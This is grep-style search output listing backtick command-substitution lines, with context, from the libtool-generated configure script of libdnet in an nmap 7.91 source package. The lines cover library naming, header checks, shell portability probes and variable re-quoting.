nmap-7.91+dfsg1/libdnet-stripped/configure-9327-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9330-      # pw32 DLLs use 'pw' prefix rather than 'lib'
nmap-7.91+dfsg1/libdnet-stripped/configure:9331:      library_names_spec='`echo ${libname} | sed -e 's/^lib/pw/'``echo ${release} | $SED -e 's/[.]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/configure-9332-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9336-  *)
nmap-7.91+dfsg1/libdnet-stripped/configure:9337:    library_names_spec='${libname}`echo ${release} | $SED -e 's/[.]/-/g'`${versuffix}${shared_ext} $libname.lib'
nmap-7.91+dfsg1/libdnet-stripped/configure-9338-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9353-  shlibpath_var=DYLD_LIBRARY_PATH
nmap-7.91+dfsg1/libdnet-stripped/configure:9354:  shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'
nmap-7.91+dfsg1/libdnet-stripped/configure-9355-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9569-  if test -f /etc/ld.so.conf; then
nmap-7.91+dfsg1/libdnet-stripped/configure:9570:    lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \$2)); skip = 1; } { if (!skip) print \$0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[	 ]*hwcap[	 ]/d;s/[:,	]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;/^$/d' | tr '\n' ' '`
nmap-7.91+dfsg1/libdnet-stripped/configure-9571-    sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-9631-  shlibpath_var=LD_LIBRARY_PATH
nmap-7.91+dfsg1/libdnet-stripped/configure:9632:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-9633-    case $host_os in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11253-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11254:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11255-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11257-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11258:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11259-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11267-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11268:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11269-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11271-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11272:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11273-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11282-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11283:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11284-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11286-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11287:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11288-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11300-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11301:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11302-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11304-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11305:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11306-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11314-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11315:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11316-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11318-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11319:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11320-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11327-do :
nmap-7.91+dfsg1/libdnet-stripped/configure:11328:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libdnet-stripped/configure-11329-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-11331-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libdnet-stripped/configure:11332:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libdnet-stripped/configure-11333-_ACEOF
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12359-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/libdnet-stripped/configure:12360:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/libdnet-stripped/configure-12361-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12450-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/libdnet-stripped/configure:12451:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libdnet-stripped/configure-12452-  as_echo='print -r --'
nmap-7.91+dfsg1/libdnet-stripped/configure-12453-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/libdnet-stripped/configure:12454:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libdnet-stripped/configure-12455-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12457-else
nmap-7.91+dfsg1/libdnet-stripped/configure:12458:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-12459-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12467-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/libdnet-stripped/configure:12468:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/libdnet-stripped/configure-12469-      esac;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12544-# ----------------------------------------
nmap-7.91+dfsg1/libdnet-stripped/configure:12545:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/libdnet-stripped/configure-12546-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12616-  {
nmap-7.91+dfsg1/libdnet-stripped/configure:12617:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/libdnet-stripped/configure-12618-  }
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12720-      case $as_dir in #(
nmap-7.91+dfsg1/libdnet-stripped/configure:12721:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/libdnet-stripped/configure-12722-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12855-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/libdnet-stripped/configure:12856:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/libdnet-stripped/configure-12857-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12880-  --*=?*)
nmap-7.91+dfsg1/libdnet-stripped/configure:12881:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/libdnet-stripped/configure:12882:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-12883-    ac_shift=:
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12885-  --*=)
nmap-7.91+dfsg1/libdnet-stripped/configure:12886:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/libdnet-stripped/configure-12887-    ac_optarg=
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12909-    case $ac_optarg in
nmap-7.91+dfsg1/libdnet-stripped/configure:12910:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-12911-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12917-    case $ac_optarg in
nmap-7.91+dfsg1/libdnet-stripped/configure:12918:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-12919-    esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-12986-delay_variable_subst='$delay_variable_subst'
nmap-7.91+dfsg1/libdnet-stripped/configure:12987:enable_shared='`$ECHO "X$enable_shared" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12988:macro_version='`$ECHO "X$macro_version" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12989:macro_revision='`$ECHO "X$macro_revision" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12990:enable_static='`$ECHO "X$enable_static" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12991:pic_mode='`$ECHO "X$pic_mode" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12992:enable_fast_install='`$ECHO "X$enable_fast_install" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12993:host_alias='`$ECHO "X$host_alias" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12994:host='`$ECHO "X$host" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12995:host_os='`$ECHO "X$host_os" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12996:build_alias='`$ECHO "X$build_alias" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12997:build='`$ECHO "X$build" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12998:build_os='`$ECHO "X$build_os" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:12999:SED='`$ECHO "X$SED" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13000:Xsed='`$ECHO "X$Xsed" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13001:GREP='`$ECHO "X$GREP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13002:EGREP='`$ECHO "X$EGREP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13003:FGREP='`$ECHO "X$FGREP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13004:LD='`$ECHO "X$LD" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13005:NM='`$ECHO "X$NM" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13006:LN_S='`$ECHO "X$LN_S" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13007:max_cmd_len='`$ECHO "X$max_cmd_len" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13008:ac_objext='`$ECHO "X$ac_objext" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13009:exeext='`$ECHO "X$exeext" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13010:lt_unset='`$ECHO "X$lt_unset" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13011:lt_SP2NL='`$ECHO "X$lt_SP2NL" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13012:lt_NL2SP='`$ECHO "X$lt_NL2SP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13013:reload_flag='`$ECHO "X$reload_flag" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13014:reload_cmds='`$ECHO "X$reload_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13015:OBJDUMP='`$ECHO "X$OBJDUMP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13016:deplibs_check_method='`$ECHO "X$deplibs_check_method" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13017:file_magic_cmd='`$ECHO "X$file_magic_cmd" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13018:AR='`$ECHO "X$AR" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13019:AR_FLAGS='`$ECHO "X$AR_FLAGS" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13020:STRIP='`$ECHO "X$STRIP" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13021:RANLIB='`$ECHO "X$RANLIB" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13022:old_postinstall_cmds='`$ECHO "X$old_postinstall_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13023:old_postuninstall_cmds='`$ECHO "X$old_postuninstall_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13024:old_archive_cmds='`$ECHO "X$old_archive_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13025:CC='`$ECHO "X$CC" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13026:CFLAGS='`$ECHO "X$CFLAGS" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13027:compiler='`$ECHO "X$compiler" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13028:GCC='`$ECHO "X$GCC" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13029:lt_cv_sys_global_symbol_pipe='`$ECHO "X$lt_cv_sys_global_symbol_pipe" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13030:lt_cv_sys_global_symbol_to_cdecl='`$ECHO "X$lt_cv_sys_global_symbol_to_cdecl" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13031:lt_cv_sys_global_symbol_to_c_name_address='`$ECHO "X$lt_cv_sys_global_symbol_to_c_name_address" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13032:lt_cv_sys_global_symbol_to_c_name_address_lib_prefix='`$ECHO "X$lt_cv_sys_global_symbol_to_c_name_address_lib_prefix" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13033:objdir='`$ECHO "X$objdir" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13034:SHELL='`$ECHO "X$SHELL" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13035:ECHO='`$ECHO "X$ECHO" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13036:MAGIC_CMD='`$ECHO "X$MAGIC_CMD" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13037:lt_prog_compiler_no_builtin_flag='`$ECHO "X$lt_prog_compiler_no_builtin_flag" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13038:lt_prog_compiler_wl='`$ECHO "X$lt_prog_compiler_wl" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13039:lt_prog_compiler_pic='`$ECHO "X$lt_prog_compiler_pic" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13040:lt_prog_compiler_static='`$ECHO "X$lt_prog_compiler_static" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13041:lt_cv_prog_compiler_c_o='`$ECHO "X$lt_cv_prog_compiler_c_o" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13042:need_locks='`$ECHO "X$need_locks" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13043:DSYMUTIL='`$ECHO "X$DSYMUTIL" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13044:NMEDIT='`$ECHO "X$NMEDIT" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13045:LIPO='`$ECHO "X$LIPO" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13046:OTOOL='`$ECHO "X$OTOOL" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13047:OTOOL64='`$ECHO "X$OTOOL64" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13048:libext='`$ECHO "X$libext" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13049:shrext_cmds='`$ECHO "X$shrext_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13050:extract_expsyms_cmds='`$ECHO "X$extract_expsyms_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13051:archive_cmds_need_lc='`$ECHO "X$archive_cmds_need_lc" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13052:enable_shared_with_static_runtimes='`$ECHO "X$enable_shared_with_static_runtimes" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13053:export_dynamic_flag_spec='`$ECHO "X$export_dynamic_flag_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13054:whole_archive_flag_spec='`$ECHO "X$whole_archive_flag_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13055:compiler_needs_object='`$ECHO "X$compiler_needs_object" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13056:old_archive_from_new_cmds='`$ECHO "X$old_archive_from_new_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13057:old_archive_from_expsyms_cmds='`$ECHO "X$old_archive_from_expsyms_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13058:archive_cmds='`$ECHO "X$archive_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13059:archive_expsym_cmds='`$ECHO "X$archive_expsym_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13060:module_cmds='`$ECHO "X$module_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13061:module_expsym_cmds='`$ECHO "X$module_expsym_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13062:with_gnu_ld='`$ECHO "X$with_gnu_ld" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13063:allow_undefined_flag='`$ECHO "X$allow_undefined_flag" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13064:no_undefined_flag='`$ECHO "X$no_undefined_flag" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13065:hardcode_libdir_flag_spec='`$ECHO "X$hardcode_libdir_flag_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13066:hardcode_libdir_flag_spec_ld='`$ECHO "X$hardcode_libdir_flag_spec_ld" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13067:hardcode_libdir_separator='`$ECHO "X$hardcode_libdir_separator" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13068:hardcode_direct='`$ECHO "X$hardcode_direct" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13069:hardcode_direct_absolute='`$ECHO "X$hardcode_direct_absolute" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13070:hardcode_minus_L='`$ECHO "X$hardcode_minus_L" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13071:hardcode_shlibpath_var='`$ECHO "X$hardcode_shlibpath_var" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13072:hardcode_automatic='`$ECHO "X$hardcode_automatic" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13073:inherit_rpath='`$ECHO "X$inherit_rpath" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13074:link_all_deplibs='`$ECHO "X$link_all_deplibs" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13075:fix_srcfile_path='`$ECHO "X$fix_srcfile_path" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13076:always_export_symbols='`$ECHO "X$always_export_symbols" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13077:export_symbols_cmds='`$ECHO "X$export_symbols_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13078:exclude_expsyms='`$ECHO "X$exclude_expsyms" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13079:include_expsyms='`$ECHO "X$include_expsyms" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13080:prelink_cmds='`$ECHO "X$prelink_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13081:file_list_spec='`$ECHO "X$file_list_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13082:variables_saved_for_relink='`$ECHO "X$variables_saved_for_relink" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13083:need_lib_prefix='`$ECHO "X$need_lib_prefix" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13084:need_version='`$ECHO "X$need_version" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13085:version_type='`$ECHO "X$version_type" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13086:runpath_var='`$ECHO "X$runpath_var" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13087:shlibpath_var='`$ECHO "X$shlibpath_var" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13088:shlibpath_overrides_runpath='`$ECHO "X$shlibpath_overrides_runpath" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13089:libname_spec='`$ECHO "X$libname_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13090:library_names_spec='`$ECHO "X$library_names_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13091:soname_spec='`$ECHO "X$soname_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13092:postinstall_cmds='`$ECHO "X$postinstall_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13093:postuninstall_cmds='`$ECHO "X$postuninstall_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13094:finish_cmds='`$ECHO "X$finish_cmds" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13095:finish_eval='`$ECHO "X$finish_eval" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13096:hardcode_into_libs='`$ECHO "X$hardcode_into_libs" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13097:sys_lib_search_path_spec='`$ECHO "X$sys_lib_search_path_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13098:sys_lib_dlsearch_path_spec='`$ECHO "X$sys_lib_dlsearch_path_spec" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13099:hardcode_action='`$ECHO "X$hardcode_action" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13100:enable_dlopen='`$ECHO "X$enable_dlopen" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13101:enable_dlopen_self='`$ECHO "X$enable_dlopen_self" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13102:enable_dlopen_self_static='`$ECHO "X$enable_dlopen_self_static" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13103:old_striplib='`$ECHO "X$old_striplib" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure:13104:striplib='`$ECHO "X$striplib" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/configure-13105-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-13168-striplib; do
nmap-7.91+dfsg1/libdnet-stripped/configure:13169:    case \`eval \\\\\$ECHO "X\\\\\$\$var"\` in
nmap-7.91+dfsg1/libdnet-stripped/configure-13170-    *[\\\\\\\`\\"\\\$]*)
nmap-7.91+dfsg1/libdnet-stripped/configure:13171:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"X\\\$\$var\\" | \\\$Xsed -e \\"\\\$sed_quote_subst\\"\\\`\\\\\\""
